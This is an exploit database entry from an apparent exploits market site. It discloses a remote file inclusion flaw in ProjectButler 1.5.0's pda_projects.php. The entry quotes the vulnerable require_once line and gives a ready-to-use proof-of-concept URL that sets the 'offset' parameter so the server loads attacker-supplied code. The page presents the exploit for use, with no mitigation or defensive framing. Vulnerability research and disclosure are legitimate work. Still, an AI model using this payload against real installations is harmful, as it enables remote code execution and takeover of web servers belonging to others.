[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability

Author
cr4wl3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5593
Category
web applications
Date add
02-08-2009
Platform
unsorted
===============================================================
ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability
===============================================================


#projectbutler - 1.5.0 (offset) RFI Vulnerability

#Author: cr4wl3r

#Download: http://sourceforge.net/projects/projectbutler/files/projectbutler/1.5.0/ProjectButler.tar.gz

#Vuln : require_once($offset."class.project.inc");

#PoC :

http://localhost/[path]/pda/pda_projects.php?offset=[AvriLhea]

#Greetz : MyMom [alm]



#  0day.today [2024-12-25]  #